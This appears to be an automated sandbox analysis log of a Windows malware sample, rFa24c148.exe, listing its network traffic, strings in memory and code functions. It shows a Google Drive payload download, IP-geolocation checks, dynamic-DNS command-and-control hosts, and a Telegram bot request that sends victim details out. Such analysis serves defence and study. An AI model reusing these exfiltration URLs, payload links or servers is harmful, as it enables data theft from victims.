            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2028/10/2024%20/%2012:44:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 28 Oct 2024 01:03:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: rFa24c148.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
            Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: rFa24c148.exe, 00000004.00000002.2993781136.00000000335FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2971653916.00000000048B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6
            Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6dk
            Source: rFa24c148.exe, 00000004.00000003.2145457011.0000000002E62000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2971357954.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2145457011.0000000002E62000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2971357954.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download
            Source: rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadW
            Source: rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloade
            Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloado
            Source: rFa24c148.exe, 00000004.00000002.2993781136.000000003348E000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.00000000334FE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: rFa24c148.exe, 00000004.00000002.2993781136.000000003348E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
            Source: rFa24c148.exe, 00000004.00000002.2993781136.00000000334FE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.00000000334B8000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
            Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003470D000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347E2000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034569000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034590000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003451B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: rFa24c148.exe, 00000004.00000002.2994718005.0000000034521000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003469A000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003456B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000344F6000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347BE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003470D000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347E2000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034569000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034590000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003451B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: rFa24c148.exe, 00000004.00000002.2994718005.0000000034521000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003469A000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003456B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000344F6000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347BE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: rFa24c148.exe, 00000004.00000002.2993781136.000000003362D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49787 version: TLS 1.2
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_00405160 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405160
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_004031FF
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,4_2_004031FF
            Source: C:\Users\user\Desktop\rFa24c148.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_004063CC0_2_004063CC
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_0040499D0_2_0040499D
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_004063CC4_2_004063CC
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0040499D4_2_0040499D
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016A0884_2_0016A088
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016C1474_2_0016C147
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016D2784_2_0016D278
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_001653624_2_00165362
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016C4684_2_0016C468
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_001664984_2_00166498
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016D5484_2_0016D548
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_001676F14_2_001676F1
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016C7384_2_0016C738
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016E9884_2_0016E988
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016CA084_2_0016CA08
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016CCD84_2_0016CCD8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016CFAA4_2_0016CFAA
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_00166FC84_2_00166FC8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016B0B84_2_0016B0B8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016F9744_2_0016F974
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_0016E97A4_2_0016E97A
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_00163E094_2_00163E09
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36551E804_2_36551E80
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_365593284_2_36559328
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36558BA04_2_36558BA0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_365517A04_2_365517A0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655FC684_2_3655FC68
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_365550284_2_36555028
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_365529684_2_36552968
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655E2584_2_3655E258
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655E24A4_2_3655E24A
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36551E704_2_36551E70
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655DE004_2_3655DE00
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655EAF84_2_3655EAF8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655E6B04_2_3655E6B0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655E6A04_2_3655E6A0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655E6AF4_2_3655E6AF
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655EF604_2_3655EF60
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655EB084_2_3655EB08
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36550B304_2_36550B30
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36550B204_2_36550B20
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36558B914_2_36558B91
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655178F4_2_3655178F
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655F3B84_2_3655F3B8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_365500404_2_36550040
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655F8104_2_3655F810
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36559C184_2_36559C18
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_365550184_2_36555018
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_365500064_2_36550006
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655F8024_2_3655F802
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655003F4_2_3655003F
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655D0F84_2_3655D0F8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655CCA04_2_3655CCA0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655D5504_2_3655D550
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655295B4_2_3655295B
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655D5404_2_3655D540
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_365595484_2_36559548
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655DDF14_2_3655DDF1
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655DDFF4_2_3655DDFF
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655D9994_2_3655D999
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655D9A74_2_3655D9A7
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3655D9A84_2_3655D9A8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36746E704_2_36746E70
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36747B784_2_36747B78
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367481D04_2_367481D0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36748FB04_2_36748FB0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36746E724_2_36746E72
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36744A784_2_36744A78
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674CE784_2_3674CE78
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674CE674_2_3674CE67
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367434604_2_36743460
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674EE684_2_3674EE68
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36744A684_2_36744A68
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674EE574_2_3674EE57
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36741A504_2_36741A50
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367434504_2_36743450
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674345F4_2_3674345F
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367400404_2_36740040
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36741A414_2_36741A41
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367460304_2_36746030
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674BC384_2_3674BC38
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367446204_2_36744620
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367460224_2_36746022
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674DC284_2_3674DC28
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674BC2B4_2_3674BC2B
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367446104_2_36744610
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367400114_2_36740011
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674FC184_2_3674FC18
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36746A184_2_36746A18
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674DC194_2_3674DC19
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367430074_2_36743007
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367430084_2_36743008
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674D2F74_2_3674D2F7
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367408F04_2_367408F0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367422F04_2_367422F0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674F2F84_2_3674F2F8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674F2E74_2_3674F2E7
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367408E04_2_367408E0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36744ED04_2_36744ED0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36744EC04_2_36744EC0
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367472C84_2_367472C8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674C0C84_2_3674C0C8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674C0B74_2_3674C0B7
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367438B84_2_367438B8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674E0B84_2_3674E0B8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367472B84_2_367472B8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674E0A74_2_3674E0A7
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36741EA84_2_36741EA8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367438A84_2_367438A8
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367404984_2_36740498
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36741E984_2_36741E98
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367464884_2_36746488
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_367404894_2_36740489
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_36747B774_2_36747B77
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_3674F7784_2_3674F778
